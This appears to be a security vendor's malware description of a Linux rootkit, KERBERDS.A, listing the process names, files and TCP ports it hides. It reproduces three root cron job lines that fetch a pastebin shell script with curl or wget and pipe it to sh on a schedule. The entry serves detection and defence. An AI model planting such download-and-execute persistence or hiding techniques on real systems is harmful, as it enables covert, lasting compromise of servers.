Rootkit.Linux.KERBERDS.A

This Rootkit arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It may be dropped by other malware.

Arrival Details

This Rootkit arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

It may be dropped by the following malware:

• Trojan.Linux.KERBERDS.A

Other Details

This Rootkit does the following:

• It is used by Trojan.Linux.KERBERDS.A for its rootkit capabilities.
• It displays a fake instance of the CPU usage.
• It hides processes with the following names:
  • khugepageds
  • kerberods
• It hides files with names containing any of the following strings:
  • khugepageds
  • ld.so.preload
  • {rootkit file name}
• It hides TCP connections which satisfy any of the following conditions:
  • Local TCP port = 51640
  • Remote TCP port = 51640
  • Remote TCP port = 6379
• It connects to the following URL(s) to download and execute another shell script:
  • https://{BLOCKED}in.com/raw/wtCwquiX
• It creates the following cron jobs to enable automatic execution of a shell script found in pastebin:
  • Path: /etc/cron.d/root
    Schedule: Every 10 minutes
    Command: */10 * * * * root (curl -fsSL https://{BLOCKED}in.com/raw/wtCwquiX||wget -q -O- https://{BLOCKED}in.com/raw/wtCwquiX)|sh
  • Path: /var/spool/cron/root
    Schedule: Every 15 minutes
    Command: */15 * * * * (curl -fsSL https://{BLOCKED}in.com/raw/wtCwquiX||wget -q -O- https://{BLOCKED}in.com/raw/wtCwquiX)|sh
  • Path: /var/spool/cron/crontabs/root
    Schedule: Every 30 minutes
    Command: */30 * * * * (curl -fsSL https://{BLOCKED}in.com/raw/wtCwquiX||wget -q -O- https://{BLOCKED}in.com/raw/wtCwquiX)|sh